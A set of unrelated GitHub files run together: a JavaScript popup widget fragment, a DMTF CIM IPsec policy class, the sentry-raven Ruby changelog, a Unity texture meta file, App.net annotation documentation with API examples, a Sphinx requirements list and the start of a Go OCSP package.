this._shown_once = true;
this.show();
}
return PopupView.__super__.update.apply(this);
},
_get_selector_element: function(selector) {
// Get an element view a 'special' jquery selector. (see widget.js)
//
// Since the modal actually isn't within the $el in the DOM, we need to extend
// the selector logic to allow the user to set css on the modal if need be.
// The convention used is:
// "modal" - select the modal div
// "modal [selector]" - select element(s) within the modal div.
// "[selector]" - select elements within $el
// "" - select the $el_to_style
if (selector.substring(0, 5) == 'modal') {
if (selector == 'modal') {
return this.$window;
} else {
return this.$window.find(selector.substring(6));
}
} else {
return PopupView.__super__._get_selector_element.apply(this, [selector]);
}
},
});
WidgetManager.register_widget_view('PopupView', PopupView);
});
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2005 DMTF. All rights reserved.
[Version ( "2.8.0" ),
UMLPackagePath ( "CIM::IPsecPolicy" ),
Description (
"SARule is a base class for defining IKE and IPsec Rules. "
"Although concrete (because it subclasses from a concrete "
"class), it is not intended to be instantiated. It defines a "
"common connection point for associating conditions and actions "
"for both types of rules. Note that each valid PolicyGroup "
"containing SARules MUST use a unique priority number for the "
"Rule in the aggregation, PolicySetComponent.Priority." ),
MappingStrings { "IPSP Policy Model.IETF|SARule" }]
class CIM_SARule : CIM_PolicyRule {
[Description (
"LimitNegotiation is used as part of processing either a "
"key exchange or IPsec Rule. Before proceeding with "
"either a phase 1 or a phase 2 negotiation, this property "
"is checked to determine if the negotiation role of the "
"Rule matches that defined for the negotiation being "
"undertaken (e.g., Initiator, Responder, or Both). If "
"this check fails, then the negotiation is stopped. Note "
"that this only applies to new negotiations and has no "
"effect on either renegotiation or refresh operations "
"with peers for which an established Security Association "
"already exists." ),
ValueMap { "1", "2", "3" },
Values { "Initiator-Only", "Responder-Only", "Either" },
MappingStrings {
"IPSP Policy Model.IETF|SARule.LimitNegotiation" }]
uint16 LimitNegotiation;
};
| {
"pile_set_name": "Github"
} |
# Changelog
## 3.1.1
**Feature**
- Add request id to headers if exists ([#1033](https://github.com/getsentry/sentry-ruby/pull/1033))
- Allow blocks on user_context ([#1023](https://github.com/getsentry/sentry-ruby/pull/1023))
- Enable configurable rack environment recorded parameters ([#860](https://github.com/getsentry/sentry-ruby/pull/860))
- Remove ActiveJob keys for both Sidekiq and DelayedJob ([#898](https://github.com/getsentry/sentry-ruby/pull/898))
**Fix**
- Remove circular dependency in transport/http.rb ([#1035](https://github.com/getsentry/sentry-ruby/pull/1035))
## 3.1.0
**Feature**
- Exclude all 4xx Rails errors ([#1004](https://github.com/getsentry/raven-ruby/pull/1004))
See the full list [here](https://github.com/getsentry/raven-ruby/blob/master/lib/raven/configuration.rb#L198-L219)
- Add some error context in `transport_failure_callback` ([#1003](https://github.com/getsentry/raven-ruby/pull/1003))
Before:
```ruby
config.transport_failure_callback = lambda { |event|
AdminMailer.email_admins("Oh god, it's on fire!", event).deliver_later
}
```
After:
```ruby
config.transport_failure_callback = lambda { |event, error|
AdminMailer.email_admins("Oh god, it's on fire because #{error.message}!", event).deliver_later
}
```
- Support cleaning up exception backtrace with customized backtrace_cleaner ([#1011](https://github.com/getsentry/raven-ruby/pull/1011))
The new config `backtrace_cleanup_callback` takes a lambda/proc object (default is `nil`) and will be called with the exception's backtrace
```ruby
Raven.configure do |config|
config.backtrace_cleanup_callback = lambda do |backtrace|
Rails.backtrace_cleaner.clean(backtrace)
end
end
```
And with the Rails integration, it'll automatically use a customized `Raven::Rails::BacktraceCleaner` to clean up exception's backtrace. It's basically Rails 6's [backtrace cleaner](https://github.com/rails/rails/blob/master/railties/lib/rails/backtrace_cleaner.rb) but without silencers.
The main reason to add this cleaner is to remove template methods from the trace, e.g.
```
app/views/welcome/view_error.html.erb in _app_views_welcome_view_error_html_erb__2807287320172182514_65600 at line 1
```
will become
```
app/views/welcome/view_error.html.erb at line 1
```
This can help Sentry group issues more accurately. See [#957](https://github.com/getsentry/raven-ruby/issues/957) for more information about this.
If you don't want this change, you can disable it with:
```ruby
Raven.configure do |config|
config.backtrace_cleanup_callback = nil
end
```
- Make dsn value accessable from config ([#1012](https://github.com/getsentry/raven-ruby/pull/1012))
You can now access the dsn value via `Raven.configuration.dsn`
**Deprecation**
- Deprecate dasherized filenames ([#1006](https://github.com/getsentry/raven-ruby/pull/1006))
If you're using
```ruby
gem 'sentry-raven', require: 'sentry-raven-without-integrations'
# or
require "sentry-raven-without-integrations"
```
you will start seeing deprecation warnings. Please change them into
```ruby
gem 'sentry-raven', require: 'sentry_raven_without_integrations'
# or
require "sentry_raven_without_integrations"
```
- Unify breadcrumb loggers activation ([#1016](https://github.com/getsentry/raven-ruby/pull/1016))
Currently, we activate our breadcrumb loggers differently:
```ruby
require "raven/breadcrumbs/sentry_logger"
Raven.configuration.rails_activesupport_breadcrumbs = true
```
It's not a nice user interface, so this PR adds a new configuration
option `breadcrumbs_logger` to improve this:
```ruby
Raven.configuration.breadcrumbs_logger = :sentry_logger
Raven.configuration.breadcrumbs_logger = :active_support_logger
Raven.configuration.breadcrumbs_logger = [:sentry_logger, :active_support_logger]
```
Please migrate to the new activation apporach, otherwise you'll see depraction warnings. And old ones will be dropped in version 4.0.
**Refactor**
- Accept non-string message in Event.from_exception ([#1005](https://github.com/getsentry/raven-ruby/pull/1005))
- Refactor event initialization ([#1010](https://github.com/getsentry/raven-ruby/pull/1010))
- Refactor sidekiq integration ([#1019](https://github.com/getsentry/raven-ruby/pull/1019))
**Fix**
- Replace sys_command usages in context.rb ([#1017](https://github.com/getsentry/raven-ruby/pull/1017))
- Fix merge error from rack-timeout raven_context on old releases ([#1007](https://github.com/getsentry/raven-ruby/pull/1007))
- Return value of `rescue_with_handler` when intercepting ActiveJob exceptions ([#1027](https://github.com/getsentry/raven-ruby/pull/1027))
## 3.0.4
- fix: Don't log warning messages when it doesn't need to (#1000)
- fix: Revert "Refactor Raven::Client class" (#1002)
## 3.0.3
- fix: Ensure Processor::Cookie can run after Processor::RemoveCircularReferences (#996)
- fix: Avoid mutating user passed in options (#994)
- fix: Fix/Refactor Raven::Cli (#989)
- ref: Refactor Raven::Client class (#995)
- It adds `Event#message_from_exception` and `Event#log_message` interfaces
## 3.0.2
- fix: Add gem target for craft
## 3.0.1
- fix: Improve SanitizeData processor (#984)
- fix: Masking cookies as key/pair instead of a single string (#983)
- fix: Transports classes' requiring issue (#986)
- fix: Frozen string issues (#977)
- feat: Officially support Rails 6 (#982)
3.0.0
----
* SDK now requires Ruby >= 2.3
* REF: Retain any literal "HTTP-" in header names [@elliterate, #950]
* REF: Delete JSON spec for recursive hashes [@ksylvest, #952]
* FEAT: Bump faraday version to latest [@ksylvest, #946]
2.13.0
----
* FIX: Sanitize event data before they are sent to async job. [@edariedl, #895]
* FIX: Problem serializing MongoDB ObjectId to JSON when used in conjunction with the delayed_job_mongoid gem. [@eagleas, #935]
* FEAT: Skip ActiveJob integration if there is a better one [@fsateler, #909]
* FIX: Bugs with send_event in asynchronous mode (#940) [@cstyles, #940]
2.12.3
----
* FIX: crash when Process.wait is used [@asBrettisay, #895]
2.12.2
----
* FIX: return tags/extra for [@rivayama, #931]
2.12.1
----
* FIX: undefined method `[]' for nil:NilClass [@HazAT, #932]
2.12.0
----
* FIX: Remove duplicate message when exception is emitted
* FIX: Frozen string bug in UTF-8 conversion
* FEATURE: Allow block on tags_context and extra_context
2.11.3
----
* FIX: infinite backoff under pressure [@Bonias, #886]
2.11.2
----
* REF: Warn on 4xx error [@iloveitaly, #862]
2.11.1
----
* FIX: Call `to_s` on breadcrumb message [@halkeye, #914]
2.11.0
----
* FEATURE: Prepend the transaction around_action so libraries with controllers can alter the value. [@drcapulet, #887]
2.10.0
-----
* FEATURE: Added support for `SENTRY_ENVIRONMENT` [@mtsmfm, #910]
* FEATURE: Added support for `SENTRY_RELEASE` [@coorasse, #911]
2.9.0
-----
* FEATURE: Added `config.inspect_exception_causes_for_exclusion`. Determines if the exception cause should be inspected for `config.excluded_exceptions` option. [@effron, #872]
2.8.0
-----
* FEATURE: Added `config.before_send`. Provide a lambda or proc to this config setting, which will be `call`ed before sending an event to Sentry. Receives `event` and `hint` as parameters. `hint` is a hash `{:exception => ex | nil, :message => message | nil}`. [@hazat, #882]
2.7.4
-----
* BUGFIX: Correctly handle public only DSNs [@mitsuhiko, #847]
* BUGFIX: context attributes with nil raised error [@joker-777, 824]
* BUGFIX: Suppress warning about enabling dyno metadata in Heroku CI [@meganemura, #833]
2.7.3
-----
* BUGFIX: Fix proxy settings for Faraday [@Strnadj, #820]
* BUGFIX: Fix duplicated events in ActiveJob w/DelayedJob and Sidekiq [@BrentWheeldon, #815]
2.7.2
-----
* BUGFIX: GlobalIDs are now displayed correctly in Sidekiq contexts [@louim, #798]
* BUGFIX: If git is not installed, fail silently during release detection [@nateberkopec]
* BUGFIX: We do not support rack-timeout <= 0.2, fix errors when incompat version present [@nateberkopec]
* BUGFIX: Put cookies in the correct spot of event [@nateberkopec, #812]
* BUGFIX: Exception context is deep_merged [@janklimo, #782]
2.7.1
-----
* BUGFIX: Fixed LocalJumpError in Rails controllers [@nateberkopec w/@frodsan, #774]
2.7.0
-----
* FEATURE: Add random sampling. [@nateberkopec, #734]
* FEATURE: Transactions. See Context docs for usage. [@nateberkopec, #743]
* FEATURE: You can set the current environment for Sentry via the `SENTRY_CURRENT_ENV` env variable. Useful if your staging environment's RACK_ENV is "production", for example. [@tijmenb, #736]
* BUGFIX: Fix wrapped classnames in old versions of Sidekiq and ActiveJob [@nateberkopec, #702]
* BUGFIX: Server names on Heroku were pretty useless before - now they follow the dyno name ("worker.1", "web.2") [@nateberkopec, #703]
* BUGFIX: ActiveJob::DeserializationError is now ignored by default. Not doing so can cause infinite loops if you are using an ActiveJob async callback. [@nateberkopec, #701]
* BUGFIX: Binary conversion to UTF-8 when binary is frozen is fixed [@nateberkopec, #757]
* BUGFIX: Our credit-card regex now matches Sentry's server behavior, which means it does not censor milliseconds since the epoch [@nateberkopec, #771]
* REFACTOR: We now use an updated port of Rails' deep_merge which should be 5-10% faster [@nateberkopec, #770]
* REFACTOR: Tests have been cleaned up, and now run in random order. [@nateberkopec]
* REFACTOR: Raven::Event has been refactored a bit [@nateberkopec]
2.6.3
-----
* BUGFIX: Fixed typo in the Heroku warning [@greysteil, #728]
* BUGFIX: Swallow IOErrors when reading the Rack request body [@nateberkopec]
* BUGFIX: Fix invalid UTF-8/circular references when using async [@nateberkopec, #730]
2.6.2
-----
* BUGFIX: If using the Sidekiq or DelayedJob adapters with ActiveJob, ActiveJob wouldn't re-raise upon capturing an exception. [@nateberkopec, 5b02ad4ff2]
* KNOWN ISSUE: When using `async`, Rack integration is not thread-safe [#721]
* KNOWN ISSUE: When using `async`, encoding errors may be raised [#725]
2.6.1
-----
* BUGFIX: Fix cases where ActionDispatch::RemoteIP would blow up during event creation [@cmoylan, #722]
* BUGFIX: In ActiveJob, don't report exceptions which can be rescued by rescue_from handlers [@bensheldon, #719]
2.6.0
-----
* FEATURE: raven-ruby now marks itself as the "ruby" logger by default, to match raven-js behavior [@nateberkopec]
* FEATURE: You may now override the default sanitization parameters [#712, @nateberkopec]
* FEATURE: Breadcrumb buffers are now publicly accessible [#686, @nateberkopec]
* FEATURE: We yell at you now if you're using Heroku but don't have runtime-dyno-metadata enabled [#715, @nateberkopec]
* FEATURE: project_root will always be set, regardless of framework [#716, @nateberkopec]
* BUGFIX: Request body and message limits now match Sentry server defaults [#714, @nateberkopec]
* BUGFIX: Sidekiq context now works as expected [#713, @nateberkopec]
* BUGFIX: Capture exceptions in ActiveJob when not using Sidekiq adapter [#709, #671, @nateberkopec]
2.5.3
-----
* BUGFIX: Deal properly with ASCII_8BIT/BINARY encodings [#689, #696, @nateberkopec]
2.5.2
-----
* BUGFIX: raven test executable should be available [#691, @nateberkopec]
* BUGFIX: Fix stack overflow when calling Backtrace#inspect [#690, @nateberkopec]
* KNOWN ISSUE: Character encoding errors [#689]
2.5.1
-----
* BUGFIX: Fix case where Pathname objects are on the load path [@nateberkopec]
* BUGFIX: Fix bad UTF-8 characters in the URL querystring [@nateberkopec]
* BUGFIX: Fix case where rack-timeout could be required twice [@nateberkopec]
* REFACTOR: Slightly cleaner character encoding fixing [@nateberkopec, @bf4]
2.5.0
-----
* FEATURE: Greatly improved performance (2-3x faster capture) [@nateberkopec]
* FEATURE: Frozen objects are now sanitized [@nateberkopec]
* BUGFIX: Grabbing Sidekiq context from "wrapped" classes works [@nateberkopec]
* BUGFIX: Relaxed Faraday dependency [@nateberkopec]
2.4.0
-----
* FEATURE: Allow customization of the Faraday adapter [#639, @StupidCodeFactory]
* BUGFIX: Report the SDK name as "raven-ruby", not "sentry-raven" [#641, @bretthoerner]
* BUGFIX: Sidekiq jobs now clear context/breadcrumbs properly between jobs [#637, @drewish]
* BUGFIX: Overriding the logger in Rails wasn't working [#638, @eugeneius]
2.3.1
-----
* BUGFIX: Backtrace parser fixed for JRuby 9k [#619, @the-michael-toy]
* BUGFIX: Rake tasks should show the correct task name [#621, @Bugagazavr]
* BUGFIX: Formatted messages work if params are `nil` [#625, @miyachik]
* BUGFIX: Backtrace logger on failed event send works with custom formatters [#627, @chulkilee]
* BUGFIX: Fix typo that caused Version headers to not be corrected [#628, @nateberkopec]
* BUGFIX: Faraday errors are more descriptive when no server response [#629, @drewish]
* BUGFIX: DelayedJob handler no longer truncates unneccessarily short [#633, @darrennix]
* BUGFIX: Fix several processors not working correctly w/async jobs stored in backends like Redis [#634, @nateberkopec]
2.3.0
-----
* CHANGE: Log levels of some messages have been changed. Raven logger is INFO level by default. [@nateberkopec]
* BUGFIX: Exception messages are now limited to 10,000 bytes. [#617, @mattrobenolt]
2.2.0
-----
* ENHANCEMENT: Sentry server errors now return some information about the response headers. [#585, @rafadc]
* BUGFIX/ENHANCEMENT: Frozen objects are no longer sanitized. This prevents some bugs, but you can now also freeze objects if you don't want them to be sanitized by the SanitizeData processor. [#594, @nateberkopec]
* ENHANCEMENT: The ability to use Raven::Instance alone is greatly improved. You can now call #capture_exception directly on an Instance (#595), give it its own Logger (#599), and set its own config which will be used when creating Events (#601). Thanks to
* ENHANCEMENT: You may now provide your own LineCache-like class to Raven. This is useful if you have source code which is not available on disk. [#606, @nateberkopec]
* BUGFIX: Raven no longer emits anything to STDOUT if a system command fails [#596, @nateberkopec]
* ENHANCEMENT: Raven now tells you exactly why it will not send an event in the logs [#602, @nateberkopec]
2.1.4
-----
* FIX: Remove `contexts` key, because it was disabling browser auto-tagging [#587, @nateberkopec]
2.1.3
-----
* Move `os` context key to `server_os` [@nateberkopec]
2.1.2
-----
* FIX: `sys_command` not falling back to Windows commands properly, logging output [@jmalves, @nateberkopec]
2.1.1
-----
* FIX: Message params should accept nil [@jmalves, #570]
2.1.0
-----
ENHANCEMENTS:
* Your client version is now included in all Events. [@nateberkopec, #559]
* OS and Ruby runtime information now included in all Events. [@nateberkopec, #560]
* Transport errors (like Sentry 4XX errors) now raise Sentry::Error, not Faraday errors. [@nateberkopec, #565]
* Sidekiq integration is streamlined and improved. Supports Sidekiq 3.x and up. [@nateberkopec, #555]
FIXES:
* Heroku release detection is improved and more accurate. You must `heroku labs:enable runtime-dyno-metadata` for it to work. [@nateberkopec, #566]
2.0.2
-----
* FIX: Don't set up Rack-Timeout middleware. [@janraasch, #558]
2.0.1
-----
* FIX: UUIDs were being rejected by Sentry as being too long [@nateberkopec]
2.0.0
-----
BREAKING CHANGES:
* The object passed to the `async` callback is now a JSON-compatible hash, not a Raven::Event. This fixes many bugs with backend job processors like DelayedJob. [@nateberkopec, #547]
* Several deprecated accessors have been removed [@nateberkopec, #543]
* You can no longer pass an object which cannot be called to `should_capture` [@nateberkopec, #542]
ENHANCEMENTS:
* Rack::Timeout exceptions are now fingerprinted by URL, making them more useful [@nateberkopec, #538]
* Added an HTTP header processor by default. We now scrub `Authorization` headers correctly. You can use `config.sanitize_http_headers` to add a list of HTTP headers you don't want sent to Sentry (e.g. ["Via", "Referer", "User-Agent", "Server", "From"]) [@nateberkopec]
FIXES:
* User/Event IP addresses are now set more accurately. This will fix many issues with local proxy setups (nginx, etc). [@nateberkopec, #546]
* We now generate a real UUID in the correct format for Event IDs [@nateberkopec, #549]
* If `async` sending fails, we retry with sync sending. [@nateberkopec, #548]
* Changed truncation approach - event messages and HTTP bodies now limited to the same amount of characters they're limited to at the Sentry server [@nateberkopec, #536]
OTHER:
* Codebase cleaned up with Rubocop [@nateberkopec, #544]
1.2.3
-----
* ENHANCEMENT: Send the current environment to Sentry [@dcramer, #530]
* BUGFIX: Fix all warnings emitted by Ruby verbose mode [@nateberkopec]
* BUGFIX: Fix compat with `log4r` [@nateberkopec, #535]
1.2.2
-----
* BUGFIX: NameError in DelayedJob integration. [janraasch, #525]
1.2.1
-----
* BUGFIX: Context clearing should now work properly in DelayedJob and Sidekiq. Also, we properly clear context if Sentry causes an exception. [nateberkopec, #520]
* BUGFIX: If Sentry will not send the event (due to environments or no DSN set), it will not attempt to "capture" (construct an event) [nateberkopec, #518]
1.2.0
-----
* FEATURE: Raven now supports Breadcrumbs, though they aren't on by default. Check the docs for how to enable. [dcramer, #497]
* FEATURE: Raven is no longer a singleton; you may have many `Raven::Instance`s. [phillbaker, #504]
* PERFORMANCE: Raven no longer uses a vendored JSON implementation. JSON processing and encoding should be up to 6x faster. [dcramer, #510]
* BUGFIX: silence_ready now works for Rails apps. [ream88, #512]
* BUGFIX: transport_failure_callback now works correctly [nateberkopec, #508]
1.1.0
-----
* The client exposes a ``last_event_id`` accessor at `Raven.last_event_id`. [dcramer, #493]
* PERFORMANCE: Skip identical backtraces from "re-raised" exceptions [databus23, #499]
* Support for ActionController::Live and Rails template streaming [nateberkopec, #486]
1.0.0
-----
We (i.e. @nateberkopec) decided that `raven-ruby` has been stable enough for some time that it's time for a 1.0.0 release!
BREAKING CHANGES:
- Dropped support for Ruby 1.8.7 [nateberkopec, #465]
- `raven-ruby` no longer reports form POST data or web cookies by default. To re-enable this behavior, remove the appropriate Processors from your config (see docs or PR) [nateberkopec, #466]
- UDP transport has been removed [dcramer, #472]
OTHER CHANGES:
- Improved performance [zanker]
- Deprecated `config.catch_debugged_exceptions`, replaced with `config.rails_report_rescued_exceptions`. `catch_debugged_exceptions` will be removed in 1.1. [nateberkopec, #483]
- Added `config.transport_failure_callback`. Provide a lambda or proc to this config setting, which will be `call`ed when Sentry returns a 4xx/5xx response. [nateberkopec, #484]
- JRuby builds fixed [RobinDaugherty]
- Fix problems with duplicate exceptions and `Exception.cause` [dcramer, #490]
- Added Exception Context. Any Exception class can define a `raven_context` instance variable, which will be merged into any Event's context which contains this exception. [nateberkopec, #491]
+ Documentation from shaneog, squirly, dcramer, ehfeng, nateberkopec.
0.15.6
------
- Fixed bug where return value of debug middleware was nil [eugeneius, #461]
- Fixed a bug in checking `catch_debugged_exceptions` [greysteil, #458]
- Fixed a deprecation warning for Rails 5 [Elektron1c97, #457]
0.15.5
------
- DelayedJob integration fixed when last_error not present [dcramer, #454]
- Release detection doesn't overwrite manual release setting in Rails [eugeneius, #450]
- Deal properly with Cap 3.0/3.1 revision logs [timcheadle, #449]
- Rails 5 support [nateberkopec, #423]
0.15.4
------
- DelayedJob integration now also truncates last_error to 100 characters [nateberkopec]
- Fix several issues with release detection - silence git log message, fix Capistrano detection [nateberkopec, kkumler]
0.15.3
------
- Double exception reporting in Rails FIXED! [nateberkopec, #422]
- Rails 3 users having issues with undefined runner fixed [nateberkopec, #428]
- Sidekiq integration works properly when ActiveJob enabled [mattrobenolt]
- Fix problems with invalid UTF-8 in exception messages [nateberkopec, #426]
- Backtraces now consider "exe" directories part of the app [nateberkopec, #420]
- Sinatra::NotFound now ignored by default [drcapulet, #383]
- Release versions now properly set. Support for Heroku, Capistrano, and Git. [iloveitaly #377, Sija #380]
- DelayedJob integration plays well with ActiveJob [kkumler, #378]
- DelayedJob handlers now truncated [nateberkopec, #431]
- Tons of code quality improvements [amatsuda, ddrmanxbxfr, pmbrent, cpizzaia, wdhorton, PepperTeasdale]
0.15.2
------
- Reverted ActiveJob support due to conflicts [#368]
0.15.1
------
- Fix ActiveJob support [greysteil, #367]
0.15.0
------
- Remove Certifi and use default Ruby SSL config [zanker, #352]
- Support for ``fingerprint`` [dcramer]
- Improved documentation and tests around various attributes [dcramer]
- Allow configurable integrations [cthornton]
- Prevent recursion with ``Exception.cause`` [dcramer, #357]
- Use empty hash if false-y value [GeekOnCoffee, #354]
- Correct some behavior with at_exit error capturing [kratob, #355]
- Sanitize matches whole words [alyssa, #361]
- Expose more debugging info to active_job integration [tonywok, #365]
- Capture exceptions swallowed by rails [robertclancy, #343]
- Sanitize the query string when the key is a symbol [jason-o-matic, #349]
- Moved documentation to docs.getsentry.com [mitsuhiko]
0.14.0
------
- Correct handling of JRuby stacktraces [dcramer]
- Better handling of unreachable file contexts [dcramer, #335]
- SSL is now default ON [dcramer, #338]
- Capture exceptions in runner tasks [eugeneius, #339]
- ActiveJob integration [lucasmazza, #327]
- Cleanup return values of async blocks [lucasmazza, #344]
- Better handling when sending NaN/Infinity JSON values [Alric, #345]
- Fix issues with digest/md5 namespace [lsb, #346]
0.13.3
------
- Fix a deprecation warning being shown in regular operation [ripta, #332]
0.13.2
------
- DelayedJob integration now includes the job id [javawizard, #321]
- Rails integration now works properly when you're not using all parts of Rails (e.g. just ActiveRecord) [lucasmazza, #323]
- Bugfix CLI tool when async config is on [if1live, #324]
- Fix and standardize tag hierarchies. Event tags > context tags > configuration tags in all cases. [JonathanBatten, #322 and eugeneius, #330]
- Using #send on Client, Base, and Transports is now deprecated. See [the commit](https://github.com/getsentry/raven-ruby/commit/9f482022a648ab662c22177ba24fd2e2b6794c34) (or the deprecation message) for their replacements. [nateberkopec, #326]
- You can now disable credit-card-like value filtering. [codekitchen, #329]
0.13.1
------
- Raven::Transports::HTTP#send returns the response now. [eagletmt, #317]
- Filenames now work a lot better when you vendor your gems. [eugeneius, #316]
- Fix raven:test issue when testing non-async configurations. [weynsee, #318]
- Fix blockless Raven#capture. [dinosaurjr, #320]
- Fix some log messages [eagletmt, #319]
0.13.0
------
- Support exception chaining [javawizard, #312]
- Add support for sending release version [eugeneius, #310]
- Better status reports on configuration [faber, #309]
- Client "send" method accepts an event in object or hash format - this will make it much easier to send Sentry events in a delayed job! [marclennox, #300]
- Fix duplicate fields in SanitizeData [wyattisimo, #294]
- Always preserve filename paths under project_root [eugeneius, #291]
- Truncate project root prefixes from filenames [eagletmt, #278]
- Renamed should_send callback to should_capture [nateberkopec, #270]
- Silencing the ready message now happens in the config as normal [nateberkopec, #260]
- Various internal refactorings [see here](https://github.com/getsentry/raven-ruby/compare/0-12-stable...master)
0.12.3
------
- URL query parameters are now sanitized for sensitive data [pcorliss, #275]
- Raven::Client can now use a proxy server when sending events to Sentry [dcramer, #277]
- Raven::Client will now use a timed backoff strategy if the server fails [codekitchen, #267]
- Automatic integration loading is now a lot less brittle [dcramer, handlers, #263, #264]
- Fixed some issues with prefixes and DSN strings [nateberkopec, #259]
- If Raven is initialized without a server config, it will no longer send events [nateberkopec, #258]
- Slightly nicer credit-card-like number scrubbing [nateberkopec, #254]
- Fix some exceptions not being caught by Sidekiq middleware [nateberkopec, #251]
- Uncommon types are now encoded correctly [nateberkopec, #249]
0.12.2
------
- Security fix where exponential numbers in specially crafted params could cause a CPU attack [dcramer, #262]
0.12.1
------
- Integrations (Sidekiq, DelayedJob, etc) now load independently of your Gemfile order. [nateberkopec, #236]
- Fixed bug where setting tags mutated your configuration [berg, #239]
- Fixed several issues with SanitizeData and UTF8 sanitization processors [nateberkopec, #238, #241, #244]
0.12.0
------
- You can now give additional fields to the SanitizeData processor. Values matched are replaced by the string mask (*********). Full documentation (and how to use with Rails config.filter_parameters) [here](https://docs.sentry.io/platforms/ruby/config/). [jamescway, #232]
- An additional processor has been added, though it isn't turned on by default: RemoveStacktrace. Use it to remove stacktraces from exception reports. [nateberkopec, #233]
- Dependency on `uuidtools` has been removed. [nateberkopec, #231]
0.11.2
------
- Fix some issues with the SanitizeData processor when processing strings that look like JSON
0.11.1
------
- Raven now captures exceptions in Rake tasks automatically. [nateberkopec, troelskn #222]
- There is now a configuration option called ```should_send``` that can be configured to use a Proc to determine whether or not an event should be sent to Sentry. This can be used to implement rate limiters, etc. [nateberkopec, #221]
- Raven now includes three event processors by default instead of one, which can be turned on and off independently. [nateberkopec, #223]
- Fixed bug with YAJL compatibility. [nateberkopec, #223]
0.10.1
------
- Updated to RSpec 3.
- Apply filters to encoded JSON data.
0.10.0
------
- Events are now sent to Sentry in all environments. To change this behavior, either unset ```SENTRY_DSN``` or explicitly configure it via ```Raven.configure```.
- gzip is now the default encoding
- Removed hashie dependency
0.9.0
-----
- Native support for Delayed::Job [pkuczynski, #176]
- Updated to Sentry protocol version 5
0.5.0
-----
- Rails 2 support [sluukonen, #45]
- Controller methods in Rails [jfirebaugh]
- Runs by default in any environment other than test, cucumber, or development. [#81]
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 43377eaa5df746b4aae828047f51089c
timeCreated: 1489880985
licenseType: Store
TextureImporter:
fileIDToRecycleName: {}
serializedVersion: 2
mipmaps:
mipMapMode: 0
enableMipMap: 1
linearTexture: 0
correctGamma: 0
fadeOut: 0
borderMipMap: 0
mipMapFadeDistanceStart: 1
mipMapFadeDistanceEnd: 3
bumpmap:
convertToNormalMap: 0
externalNormalMap: 0
heightScale: 0.25
normalMapFilter: 0
isReadable: 0
grayScaleToAlpha: 0
generateCubemap: 0
cubemapConvolution: 0
cubemapConvolutionSteps: 7
cubemapConvolutionExponent: 1.5
seamlessCubemap: 0
textureFormat: -1
maxTextureSize: 2048
textureSettings:
filterMode: -1
aniso: -1
mipBias: -1
wrapMode: -1
nPOTScale: 1
lightmap: 0
rGBM: 0
compressionQuality: 50
allowsAlphaSplitting: 0
spriteMode: 0
spriteExtrude: 1
spriteMeshType: 1
alignment: 0
spritePivot: {x: 0.5, y: 0.5}
spriteBorder: {x: 0, y: 0, z: 0, w: 0}
spritePixelsToUnits: 100
alphaIsTransparency: 0
spriteTessellationDetail: -1
textureType: -1
buildTargetSettings: []
spriteSheet:
serializedVersion: 2
sprites: []
outline: []
spritePackingTag:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
---
title: "Using Annotations"
---
# Using Annotations
* TOC
{:toc}
Annotations are metadata that can be attached to Users, Posts, Channels, Messages, or Files. This allows developers and users to add extra information to App.net objects outside of the fields App.net has already defined.
## What's so great about annotations?
Annotations give developers a tremendous degree of freedom to expand upon the core functionality of App.net. They provide a way for developers to add arbitrary data to App.net objects, enabling richer content and new services.
Let's say I'm at a restaurant eating a great dinner, but instead of just telling my followers about this restaurant I want them to be able to see a map of where it is. My Post could include geographic information about the address for the restaurant in an annotation and then clients that support this geographic annotation could show the restaurant on a map (in addition to showing my post). If the restaurant is on [OpenTable](http://www.opentable.com), I could include an annotation indicating that and my followers could see the menu and make a reservation in their own App.net client.
## Anatomy of an annotation
Annotations are a list of objects that have a `type` and a `value`.
<%= json_output([
{
"type" => "com.example.awesome",
"value" => {
"annotations work" => "beautifully"
}
}
]) %>
The `type` field essentially identifies a schema for the `value` of the annotation. Please see the [annotations reference](/reference/meta/annotations/#documenting-annotations) for more information about different kinds of annotations.
## Example: Attach an image to a post
When you see an image included in an App.net post, you see the results of annotations at work. We'll be using the [`net.app.core.oembed`](https://github.com/appdotnet/object-metadata/blob/master/annotations/net.app.core.oembed.md) annotation to embed a photo in an App.net post.
<% data = {
"text" => "Hello App.net from curl, with a photo!",
"annotations" => [
{
"type" => "net.app.core.oembed",
"value" => {
"type" => "photo",
"version" => "1.0",
"width" => 870,
"height" => 106,
"url" => "https://files.app.net/2jxk2CoP4",
"thumbnail_width" => 200,
"thumbnail_height" => 24,
"thumbnail_url" => "https://files.app.net/2jxk12R7F",
"embeddable_url" => "https://app.net"
}
}
]
} %>
<%= curl_example(:post, "posts?include_annotations=1", :none, {:data => data}) %>
Most clients expect `thumbnail_url`, `thumbnail_width`, and `thumbnail_height` to render a preview inline with the post.
## Example: Attach an App.net file to a post as an image
Most apps that include images don't generate a raw oembed annotation to an image hosted somewhere else, they use the [App.net File storage](/reference/resources/files/). To do this, first you have to upload a file to App.net and then you have to create the post with an annotation as we did above.
### Upload a file
<%= curl_example(:post, "files", :none, {
:files => {
"type" => "testing.image",
"content" => "@filename.png;type=image/png",
}
}) %>
This will return a JSON blob similar with the following fields we care about:
<%= json_output({
"data" => {
"file_token" => "1234567NQD4isqELTZlIiEd9fp24e5wC1NACSYFI_Svc7-hkvCKWOTsOPQLrrMiVu-9x2L400MbKlG4T8-WA97HokUdApqXwtQjJt9wOJ12ZZX_hZSFmj_O0xFlvJt8rwqaTAOvK7qECaj1LS131baLjJojErPB5TwZiQQJko0BU",
"id" => "123",
},
}) %>
### Attach the file to a post
Once we've uploaded the file, we can attach it to a post and let App.net generate the correct oembed annotation:
<% data = {
"text" => "Hello App.net from curl, with an App.net hosted photo!",
"annotations" => [{
"type" => "net.app.core.oembed",
"value" => {
"+net.app.core.file" => {
"file_id" => "<data.file_id from the last command>",
"file_token" => "<data.file_token from the last command>",
"format" => "oembed"
}
}
}]
} %>
<%= curl_example(:post, "posts?include_annotations=1", :none, {:data => data}) %>
Since annotations can contain up to [8192 bytes of data](/reference/meta/annotations/#limit), they are not returned by default. We have to explicitly request that App.net return annotations by passing the `include_annotations=1` query string parameter.
| {
"pile_set_name": "Github"
} |
# force older sphinx version for readthedocs build
sphinx==1.6.7
sphinx-fortran
| {
"pile_set_name": "Github"
} |
// Copyright 2013 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package ocsp parses OCSP responses as specified in RFC 2560. OCSP responses
